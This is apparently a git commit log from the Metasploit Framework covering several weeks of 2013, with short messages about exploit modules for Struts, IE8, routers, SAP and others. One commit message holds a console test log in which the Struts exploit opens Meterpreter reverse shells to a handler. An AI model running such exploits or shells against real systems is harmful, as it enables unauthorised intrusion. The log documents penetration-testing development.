Landing #1896 - Add OSVDB ref 82925 for symantec_web_gateway_exec.rb
2013-06-03 02:13:34 -05:00
Steve Tornio
c2c630c338
add osvdb ref 93444
2013-06-02 21:03:44 -05:00
Steve Tornio
bc993b76fc
add osvdb ref 82925
2013-06-02 20:43:16 -05:00
Steve Tornio
ae17e9f7b5
add osvdb ref 56992
2013-06-02 18:32:46 -05:00
sinn3r
cb33c5685f
Landing #1890 - Oracle WebCenter Content openWebdav() vulnerability
2013-06-02 12:35:40 -05:00
Steve Tornio
61c8861fcf
add osvdb ref
2013-06-02 08:33:42 -05:00
sinn3r
cc951e3412
Modifies the exploit a little for better stability
...
This patch makes sure the LFH is enabled before the CGenericElement
object is created. Triggers is also modified a little.
2013-06-02 03:02:42 -05:00
jvazquez-r7
f68d35f251
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-06-01 17:09:23 -05:00
jvazquez-r7
1917961904
Land #1888 , @swtornio's update for OSVDB references
2013-06-01 16:36:59 -05:00
jvazquez-r7
5939ca8ce4
Add analysis at the end of the module
2013-06-01 15:59:17 -05:00
jvazquez-r7
9be8971bb0
Add module for ZDI-13-094
2013-06-01 15:44:01 -05:00
Steve Tornio
8671ae9de7
add osvdb ref
2013-06-01 14:27:50 -05:00
Steve Tornio
80f1e98952
added osvdb refs
2013-06-01 07:04:43 -05:00
jvazquez-r7
d42ac02e3e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 23:01:05 -05:00
jvazquez-r7
f8e9535c39
Add ZDI reference
2013-05-31 20:50:53 -05:00
jvazquez-r7
3a360caba1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 19:03:21 -05:00
sinn3r
90117c322c
Landing #1874 - Post API cleanup
2013-05-31 16:15:23 -05:00
James Lee
4f6d80c813
Land #1804 , user-settable filename for psexec
2013-05-31 13:34:52 -05:00
James Lee
5964d36c40
Fix a syntax error
...
Also uses a prettier syntax for setting the filename (ternary operators
are hard to read).
2013-05-31 13:31:36 -05:00
jvazquez-r7
48b14c09e3
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-31 01:12:46 -05:00
jvazquez-r7
146a30ec4d
Do minor cleanup for struts_include_params
2013-05-31 01:01:15 -05:00
jvazquez-r7
a7a754ae1f
Land #1870 , @Console exploit for Struts includeParams injection
2013-05-31 00:59:33 -05:00
jvazquez-r7
70037fdbed
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-30 15:02:34 -05:00
jvazquez-r7
d0489b5d1e
Delete some commas
2013-05-30 14:25:53 -05:00
jvazquez-r7
6abb591428
Do minor cleanup for lianja_db_net
2013-05-30 14:25:05 -05:00
jvazquez-r7
38e5c2bed2
Land #1877 , @zeroSteiner's exploit for Lianja SQL
2013-05-30 14:23:45 -05:00
Console
eb4162d41b
boolean issue fix
2013-05-30 18:15:33 +01:00
Console
5fa8ecd334
removed magic number 109
...
now calculated from the actual length of all static URL elements
2013-05-30 17:40:43 +01:00
Spencer McIntyre
70e1379338
Use msvcrt in ropdb for stability.
2013-05-30 11:13:22 -04:00
Console
47524a0570
converted request params to hash merge operation
2013-05-30 15:36:01 +01:00
Console
51879ab9c7
removed unnecessary lines
2013-05-30 15:15:10 +01:00
Console
abb0ab12f6
Fix msftidy compliance
2013-05-30 13:10:24 +01:00
Console
5233ac4cbd
Progress bar instead of message spam.
2013-05-30 13:08:43 +01:00
Console
fb388c6463
Chunk length is now "huge" for POST method
...
minor changes to option text and changed HTTPMETHOD to an enum.
2013-05-30 11:30:24 +01:00
Console
ab6a2a049b
Fix issue with JAVA meterpreter failing to work.
...
Was down to the chunk length not being set correctly.
Still need to test against windows.
```
msf exploit(struts_include_params) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Universal
1 Linux Universal
2 Java Universal
msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.0.1 - Meterpreter session 5 closed. Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
2013-05-30 10:35:29 +01:00
Console
d70526f4cc
Renamed as per suggestion
2013-05-30 09:29:26 +01:00
jvazquez-r7
1d0c4151b7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-29 15:29:26 -05:00
Tod Beardsley
e7a1f06fbc
Modules shouldn't be +x
2013-05-29 15:11:35 -05:00
Console
7c38324b76
Considered using the bourne stager.
...
Decided against it as current implementation of JAVA base64
encode/decode appears to be more OS agnostic and robust.
Tidied up a few lines of code and added some more output.
2013-05-29 14:21:23 +01:00
Spencer McIntyre
c3ab1ed2a5
Exploit module for Lianja SQL 1.0.0RC5.1
2013-05-29 08:48:41 -04:00
Console
ec315ad50d
Modified URI handling to make use of target_uri and vars_get/post.
...
Added support for both GET and POST methods as both are vulnerable to
this exploit.
2013-05-29 12:56:34 +01:00
Console
b39531cea6
Added references
2013-05-28 23:15:10 +01:00
James Lee
f3ff5b5205
Factorize and remove includes
...
Speeds up compilation and removes dependency on bionic source
2013-05-28 15:46:06 -05:00
jvazquez-r7
66ea59b03f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-28 15:22:46 -05:00
Console
7b43117d87
Added RCE for Struts versions earlier than 2.3.14.2
...
Heavily based upon my previous module for parameters
interceptor based RCE.
Tested against the POC given at the reference website successfully.
2013-05-28 18:26:57 +01:00
James Lee
9843dc4cb4
Land #1708 , android meterpreter
...
Conflicts:
data/meterpreter/ext_server_stdapi.jar
2013-05-28 12:19:45 -05:00
sinn3r
d16d316658
Fixes mssql_findandsampledata & ms11_006_creat esizeddibsection
...
[FixRM:7987]
[FixRM:7986]
2013-05-28 11:15:17 -05:00
sinn3r
73aa14cb91
Landing #1868 - IBM SPSS SamplePower 3.0 module (CVE-2012-5946)
2013-05-28 11:02:21 -05:00
Tod Beardsley
75d6c8079a
Spelling, whitespace
...
Please be sure to run msftidy.rb on new modules. Thanks!
2013-05-28 10:03:37 -05:00
jvazquez-r7
e678b2c5d8
Add module for CVE-2012-5946
2013-05-26 00:21:20 -05:00
darknight007
57b7e4ec44
Update ms11_006_createsizeddibsection.rb
2013-05-25 13:14:41 +06:00
jvazquez-r7
d5cf6c1fbc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-23 12:37:54 -05:00
sinn3r
81ad280107
Landing #1856 - CVE-2013-0758 Firefox <= 17.0.1 + Flash RCE
...
Chained exploit using CVE-2013-0758 and CVE-2013-0757
2013-05-23 12:21:10 -05:00
sinn3r
67861794f6
Fix automatic payload selection
2013-05-22 22:37:18 -05:00
jvazquez-r7
23bc11c7e0
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-22 15:15:58 -05:00
sinn3r
23fe3146dc
Extra print_status I don't want
2013-05-22 14:38:30 -05:00
jvazquez-r7
bfcd86022d
Add code cleanup for nginx_chunked_size.
2013-05-22 14:37:42 -05:00
sinn3r
0e6576747a
Fix target selection probs, and swf path
2013-05-22 14:34:00 -05:00
jvazquez-r7
0dee5ae94d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-22 12:54:44 -05:00
LinuxGeek247
81b690ae4b
Initial check in of nginx module
2013-05-22 13:52:00 -04:00
sinn3r
ecb9d1d7fa
Landing #1848 - AdobeCollabSync Buffer Overflow on Adobe Reader X
2013-05-22 12:24:42 -05:00
Joe Vennix
aae4768563
Fix whitespace issues from msftidy.
2013-05-21 14:31:36 -05:00
Joe Vennix
eaeb10742a
Add some comments and clean some things up.
2013-05-21 14:01:14 -05:00
Joe Vennix
978aafcb16
Add DEBUG option, pass args to .encoded_exe().
2013-05-21 14:01:14 -05:00
Joe Vennix
ee8a97419c
Add some debug print calls to investigate Auto platform selection.
2013-05-21 14:01:13 -05:00
Joe Vennix
60fdf48535
Use renegerate_payload(cli, ...).
2013-05-21 14:01:13 -05:00
jvazquez-r7
367e789047
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-20 18:49:38 -05:00
jvazquez-r7
53cb493bc9
Fix @jlee-r7's feedback
2013-05-20 18:44:21 -05:00
James Lee
f4498c3916
Remove $Id tags
...
Also adds binary coding magic comment to a few files
2013-05-20 16:21:03 -05:00
jvazquez-r7
94bc3bf8eb
Fix msftidy warning
2013-05-20 10:35:59 -05:00
jvazquez-r7
395aac90c2
Do minor cleanup for linksys_wrt160nv2_apply_exec
2013-05-20 10:34:39 -05:00
jvazquez-r7
08b2c9db1e
Land #1801 , @m-1-k-3's linksys wrt160n exploit
2013-05-20 10:33:44 -05:00
jvazquez-r7
8235ba6316
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-20 08:48:42 -05:00
m-1-k-3
1a904ccf7d
tftp download
2013-05-19 20:37:46 +02:00
jvazquez-r7
dfa19cb46d
Do minor cleanup for dlink_dir615_up_exec
2013-05-19 12:43:01 -05:00
jvazquez-r7
348705ad46
Land #1800 , @m-1-k-3's exploit for DLINK DIR615
2013-05-19 12:42:02 -05:00
m-1-k-3
f3a2859bed
removed user,pass in request
2013-05-19 18:50:12 +02:00
m-1-k-3
aee5b02f65
tftp download check
2013-05-19 18:45:01 +02:00
m-1-k-3
4816925f83
feeback included
2013-05-19 16:19:45 +02:00
jvazquez-r7
85ceaa1a62
Add module for CVE-2013-2730
2013-05-18 12:44:24 -05:00
jvazquez-r7
0f3b13e21d
up to date
2013-05-16 15:02:41 -05:00
James Lee
3009bdb57e
Add a few more references for those without
2013-05-16 14:32:02 -05:00
h0ng10
ccef6e12d2
changed to array in array
2013-05-16 19:03:47 +02:00
h0ng10
460542506d
changed to array
2013-05-16 19:01:20 +02:00
h0ng10
378f0fff5b
added missing comma
2013-05-16 18:59:46 +02:00
Joe Vennix
1a5c747bb9
Update description.
2013-05-15 23:52:51 -05:00
Joe Vennix
178a43a772
Whitespace tweaks and minor bug fix. Wrong payloads still run.
2013-05-15 23:47:04 -05:00
Joe Vennix
f4b6db8c49
Tweak whitespace.
2013-05-15 23:35:59 -05:00
Joe Vennix
a7d79e2a51
Oops, don't cache payload_filename.
2013-05-15 23:34:14 -05:00
Joe Vennix
4d5c4f68cb
Initial commit, works on three OSes, but automatic mode fails.
2013-05-15 23:32:02 -05:00
jvazquez-r7
cb24d3ddae
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 11:13:29 -05:00
James Lee
61afe1449e
Landing #1275 , bash cmdstager
...
Conflicts:
lib/rex/exploitation/cmdstager.rb
Conflict was just the $Id$ tag, which is no longer used anyway.
2013-05-15 10:44:05 -05:00
jvazquez-r7
011b0bb741
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-15 09:07:47 -05:00
jvazquez-r7
649a8829d3
Add modules for Mutiny vulnerabilities
2013-05-15 09:02:25 -05:00
jvazquez-r7
352a7afcd6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 22:29:24 -05:00
sinn3r
e1111928c2
Adds patch info for ie_cgenericelement_uaf
...
This one is MS13-038
2013-05-14 14:55:02 -05:00
jvazquez-r7
500ef5df13
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 14:49:05 -05:00
sinn3r
41e9f35f3f
Landing #1819 - Convert sap_mgmt_con_osexec_payload to multi platform
2013-05-14 14:48:16 -05:00
sinn3r
5e925f6629
Description update
2013-05-14 14:20:27 -05:00
jvazquez-r7
b9caa23b30
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-14 12:26:23 -05:00
jvazquez-r7
42cfa72f81
Update data after test kloxo 6.1.12
2013-05-13 19:09:06 -05:00
jvazquez-r7
58f2373171
Added module for EDB 25406
2013-05-13 18:08:23 -05:00
Tod Beardsley
e3384439ed
64-bit, not '64 bits'
2013-05-13 15:40:17 -05:00
jvazquez-r7
01ce751c51
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-12 17:08:14 -05:00
m-1-k-3
981cc891bc
description
2013-05-12 20:07:32 +02:00
jvazquez-r7
ce594a3ba2
Deprecate modules/exploits/windows/http/sap_mgmt_con_osexec_payload
2013-05-12 08:46:40 -05:00
jvazquez-r7
495f1e5013
Add multi platform module for SAP MC exec exploit
2013-05-12 08:46:00 -05:00
sinn3r
7fcf20201b
Ranking should be the same (to GoodRanking)
2013-05-11 09:19:25 -05:00
jvazquez-r7
891e36c947
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-09 17:47:35 -05:00
jvazquez-r7
4147a27216
Land #1667 , @nmonkee's sap_soap_rfc_sxpg_command_exec exploit
2013-05-09 17:00:11 -05:00
jvazquez-r7
6842432abb
Land #1678 , @nmonkee's sap_soap_rfc_sxpg_call_system_exec exploit
2013-05-09 16:52:01 -05:00
jvazquez-r7
823d89935a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-09 12:36:43 -05:00
Rob Fuller
95b0d4e5ec
move filename init up to remove dup code
...
as suggested by @jlee-r7
2013-05-09 13:29:21 -04:00
sinn3r
9043eeda66
A slight change for stability
...
While updating ie_cgenericelement_uaf earlier today, I noticed the
changes made it a tiny bit less stable. Juan's test log in #1809
also kinda shows that (with the first attempt failing), so I decided
to go back and move the string crafting part, that way between
CollectGarbage() and the overwrite, there is less noise, and hopefully
more stable. I did a few tests, seems better.
2013-05-08 20:02:55 -05:00
jvazquez-r7
866fa167ab
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-08 16:29:52 -05:00
jvazquez-r7
bdd2287daf
Land #1809 , @wchen-r7's modification for ie_cgenericelement_uaf
2013-05-08 16:21:11 -05:00
sinn3r
9a1400a75b
Forgot to remove this print_warning
2013-05-08 15:44:04 -05:00
sinn3r
075f6e8d45
Updates ROP chain and mstime_malloc usage
2013-05-08 15:42:45 -05:00
sinn3r
c7609ac7d1
Initial update
2013-05-08 14:24:52 -05:00
jvazquez-r7
1aa80cd35e
Add module for CVE-2013-0726
2013-05-08 13:48:48 -05:00
jvazquez-r7
e939de583c
Clean up and multi platform support for sap_soap_rfc_sxpg_command_exec
2013-05-07 22:46:39 -05:00
jvazquez-r7
5f59d9f723
Move sap_soap_rfc_sxpg_command_exec to multi dir
2013-05-07 22:46:04 -05:00
jvazquez-r7
ab60e0bfb7
Fix print message
2013-05-07 22:41:15 -05:00
jvazquez-r7
24bad9c15c
Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform
2013-05-07 17:03:10 -05:00
jvazquez-r7
76f6d9f130
Move module to multi-platform location
2013-05-07 17:01:56 -05:00
Rob Fuller
71c68d09c1
Allow user ability to set filename for psexec service binary
...
This should probably be higher up for all
generate_payload_exe but would take a major edit
2013-05-07 15:26:22 -03:00
jvazquez-r7
bcdad23559
up to date
2013-05-06 23:09:32 -05:00
jvazquez-r7
0fa65a6802
Merge branch 'sap_soap_rfc_sxpg_command_exec' of https://github.com/nmonkee/metasploit-framework
2013-05-06 18:50:31 -05:00
m-1-k-3
09bf23f4d6
linksys wrt160n tftp download module
2013-05-06 16:18:15 +02:00
m-1-k-3
22d850533a
dir615 down and exec exploit
2013-05-06 15:33:45 +02:00
jvazquez-r7
425a16c511
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-05 22:00:07 -05:00
Tod Beardsley
8239998ada
Typo on URL for #1797 . Thx @Meatballs1
2013-05-05 12:26:06 -05:00
Tod Beardsley
c9ea7e250e
Fix disclosure date, ref for #1897
2013-05-05 12:13:02 -05:00
sinn3r
a33510e821
Add MS IE8 DoL 0day exploit (CVE-2013-1347)
...
This module exploits a use-after-free vuln in IE 8, used in the
Department of Labor attack.
2013-05-05 12:04:17 -05:00
jvazquez-r7
2384f34ada
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-03 15:39:16 -05:00
jvazquez-r7
13202a3273
Add OSVDB reference
2013-05-03 09:46:29 -05:00
jvazquez-r7
a95de101e7
Delete extra line
2013-05-02 22:04:27 -05:00
jvazquez-r7
6210b42912
Port EDB 25141 to msf
2013-05-02 22:00:43 -05:00
jvazquez-r7
796f7a39ac
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-05-02 20:04:48 -05:00
jvazquez-r7
a2e1fbe7a9
Make msftidy happy
2013-05-02 19:46:26 -05:00
sinn3r
eb23b5feeb
Forgot to remove function ie8_smil. Don't need this anymore.
2013-05-02 14:04:15 -05:00
sinn3r
329e8228d1
Uses js_mstime_malloc to do the no-spray technique
2013-05-02 14:00:15 -05:00
jvazquez-r7
a7e4ba5015
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-30 08:32:24 -05:00
Tod Beardsley
60e0cfb17b
Trivial description cleanup
2013-04-29 14:11:20 -05:00
jvazquez-r7
a4632b773a
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-28 12:59:16 -05:00
sinn3r
1d9a695d2b
Landing #1772 - Adds phpMyadmin Preg_Replace module (CVE-2013-3238)
...
[Closes #1772 ]
2013-04-28 12:17:16 -05:00